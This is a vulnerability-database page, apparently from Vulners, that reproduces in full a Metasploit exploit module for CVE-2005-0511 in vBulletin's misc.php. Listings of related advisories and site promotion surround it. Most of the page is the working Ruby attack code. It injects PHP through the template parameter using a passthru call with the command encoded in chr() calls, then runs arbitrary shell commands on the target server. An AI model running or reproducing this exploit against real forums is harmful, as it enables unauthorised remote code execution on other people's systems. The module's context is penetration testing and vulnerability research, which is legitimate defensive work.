Lucene search
K

vBulletin misc.php Template Name Arbitrary Code Execution

🗓️ 05 Jan 2007 05:58:13Reported by str0ke <[email protected]>, cazz <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 30 Views

vBulletin misc.php Template Name Arbitrary Code Executio

Related
Code
ReporterTitlePublishedViews
Family
Tenable Nessus
vBulletin < 3.0.7 misc.php PHP Code Injection
22 Feb 200500:00
nessus
Tenable Nessus
vBulletin misc.php template Parameter PHP Code Injection
24 Feb 200500:00
nessus
Circl
CVE-2005-0511
25 Jul 201000:00
circl
CVE
CVE-2005-0511
23 Feb 200505:00
cve
Cvelist
CVE-2005-0511
23 Feb 200505:00
cvelist
Exploit DB
vBulletin - &#039;misc.php&#039; Template Name Arbitrary Code Execution (Metasploit)
25 Jul 201000:00
exploitdb
NVD
CVE-2005-0511
21 Feb 200505:00
nvd
Packet Storm
vBulletin misc.php Template Name Arbitrary Code Execution
30 Oct 200900:00
packetstorm
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  # XXX This module needs an overhaul
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'vBulletin misc.php Template Name Arbitrary Code Execution',
      'Description'    => %q{
          This module exploits an arbitrary PHP code execution flaw in
        the vBulletin web forum software. This vulnerability is only
        present when the "Add Template Name in HTML Comments" option
        is enabled. All versions of vBulletin prior to 3.0.7 are
        affected.
      },
      'Author'         =>
        [
          'str0ke <str0ke[at]milw0rm.com>',
          'cazz'
        ],
      'License'        => BSD_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2005-0511' ],
          [ 'BID', '12622' ],
          [ 'OSVDB', '14047' ],
        ],
      'Privileged'     => false,
      'Platform'       => ['unix'],
      'Arch'           => ARCH_CMD,
      'Payload'        =>
        {
          'Space'       => 512,
          'DisableNops' => true,
          'Keys'        => ['cmd', 'cmd_bash'],
        },
      'Targets'        => [ ['Automatic', { }], ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => '2005-02-25'
      ))

    register_options(
      [
        OptString.new('PATH', [ true,  "Path to misc.php", '/forum/misc.php']),
      ])

    deregister_options(
      'HTTP::junk_slashes' # For some reason junk_slashes doesn't always work, so turn that off for now.
    )
  end

  def go(command)
    wrapper = rand_text_alphanumeric(rand(128)+32)

    command = "echo #{wrapper};#{command};echo #{wrapper};"
    encoded = command.unpack("C*").collect{|x| "chr(#{x})"}.join('.')

    res = send_request_cgi({
        'uri'      => datastore['PATH'],
        'method'   => 'GET',
        'vars_get' =>
          {
            'do' => "page",
            'template' => "{${passthru(#{encoded})}}"
          }
      }, 5)

    if (res and res.body)
      b = /#{wrapper}[\s\r\n]*(.*)[\s\r\n]*#{wrapper}/sm.match(res.body)
      if b
        return b.captures[0]
      elsif datastore['HTTP::chunked']
        b = /chunked Transfer-Encoding forbidden/.match(res.body)
        if b
          fail_with(Failure::Unknown, 'Target PHP installation does not support chunked encoding. Support for chunked encoded requests was added to PHP on 12/15/2005. Try disabling HTTP::chunked and trying again.')
        end
      end
    end

    return nil
  end

  def check
    response = go("echo ownable")
    if (!response.nil? and response =~ /ownable/sm)
      return Exploit::CheckCode::Vulnerable
    end
    return Exploit::CheckCode::Safe
  end

  def exploit
    response = go(payload.encoded)
    if response == nil
      print_error('exploit failed: no response')
    else
      if response.length == 0
        print_good('Exploit Successful')
      else
        print_status("Command returned #{response}")
      end
      handler
    end
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Oct 2020 20:00Current
7.7High risk
Vulners AI Score7.7
CVSS 27.5
EPSS0.35818
30